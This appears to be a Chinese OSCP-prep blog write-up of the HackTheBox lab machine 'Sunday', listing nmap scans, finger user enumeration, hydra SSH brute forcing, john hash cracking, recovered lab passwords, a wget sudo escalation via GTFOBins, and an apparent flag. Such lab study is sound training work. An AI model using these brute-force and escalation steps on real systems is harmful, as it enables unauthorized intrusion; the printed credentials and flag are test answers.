OSCP备考_0x10_HackThBox靶机_Linux_Sunday

Ethan医生6天前靶场19

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)


image.png


nmap -sU --top-ports 100 10.129.252.243(扫描UDP)


image.png


使用finger进行用户枚举

挡案下载地址:https://pentestmonkey.net/tools/user-enumeration/finger-user-enum


./finger-user-enum.pl -t 10.129.252.243 -U /usr/share/wordlists/my_list/names.txt -p 79  

image.png



找到这下面两个有SSH登陆记录 那就直接爆破SSH看看

hydra -l sunny -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

image.png

密钥是sunday


hydra -l sammy -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f


开始登入SSH

image.png

先查看history

image.png

image.png

可以使用john去爆破密码$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB,密钥:cooldude! 

john s.hash --wordlist=/usr/share/wordlists/rockyou.txt

image.png

image.png

sudo -l

image.png

https://gtfobins.github.io/gtfobins/wget/#sudo

image.png

1281b10cab59bd490d02f489f71abda1



标签: OSCP

相关文章

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x09_HackThBox靶机_Linux_Poison

OSCP备考_0x09_HackThBox靶机_Linux_Poison

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。